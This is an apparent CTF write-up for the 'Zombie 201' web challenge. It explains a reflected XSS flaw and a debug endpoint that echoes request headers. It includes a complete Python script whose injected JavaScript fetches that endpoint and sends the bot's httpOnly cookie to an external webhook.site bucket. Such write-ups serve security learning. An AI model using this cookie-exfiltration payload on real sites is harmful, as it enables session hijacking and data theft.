Tags: web xss 

Rating:

This writeup can also be found at [https://www.bugsbunnies.tk/2023/03/18/zombie.html](https://www.bugsbunnies.tk/2023/03/18/zombie.html).

We're presented with a simple webpage.

![Webpage](https://www.bugsbunnies.tk/assets/images/2023-03-20%2008-29-33.png)

By submitting `<script>alert(1)</script>` to the first input we can see that it is not sanitized. This means we can inject arbitrary javascript into the page, making this an XSS vulnerabilty.

The user input is submitted as a url parameter like this: `https://zombie-101-tlejfksioa-ul.a.run.app/zombie?show=%3Cscript%3Ealert%281%29%3C%2Fscript%3E`.

This url can be submitted through the second input field and a bot will look at it.

The webpage is the same for all versions of the challenge, only the config changes slightly.

For Zombie 201 the config is as follows:

```json
{
"flag": "wctf{redacted}",
"httpOnly": true,
"allowDebug": true
}
```

The config is used to construct a cookie that is set on the bot when it visits the page.

By looking at the source code we can find an interesting endpoint however:

```js
// useful for debugging cloud deployments
app.get("/debug", function (req, res) {
if (config.allowDebug) {
res.send({ "remote-ip": req.socket.remoteAddress, ...req.headers });
} else {
res.send("sorry, debug endpoint is not enabled");
}
});
```

By utilizing this endpoint we can get the cookie through reflected XSS:

```python
import requests
import os
import json
import urllib.parse

# setup bucket
token_path = ".webhook-site.token"
if os.path.exists(token_path):
with open(token_path, "r") as f:
bucket_id = f.read()
else:
r = requests.post("https://webhook.site/token")
bucket_id = r.json()["uuid"]
with open(token_path, "w") as f:
f.write(bucket_id)

bucket_url = f"https://webhook.site/{bucket_id}"
print(f"https://webhook.site/#!/{bucket_id}/")

# execute exploit
base_base = 'https://zombie-201-tlejfksioa-ul.a.run.app'
visit_base = f'{base_base}/visit?url='
show_base = f'{base_base}/zombie?show='
payload = f"""
<script>
(async function() {{
await fetch("{bucket_url}?cookie=" + JSON.stringify(await (await fetch("https://zombie-201-tlejfksioa-ul.a.run.app/debug")).json()))
}})();
</script>
"""

target_url = visit_base + urllib.parse.quote_plus(show_base + urllib.parse.quote_plus(payload))
print("sending", target_url)
r = requests.get(target_url)
print(r.text)

# fetch result
r = requests.get(f"https://webhook.site/token/{bucket_id}/requests?sorting=newest")
print(json.loads(r.json()["data"][0]["query"]["cookie"])["cookie"])
```

Original writeup (https://www.bugsbunnies.tk/2023/03/18/zombie.html).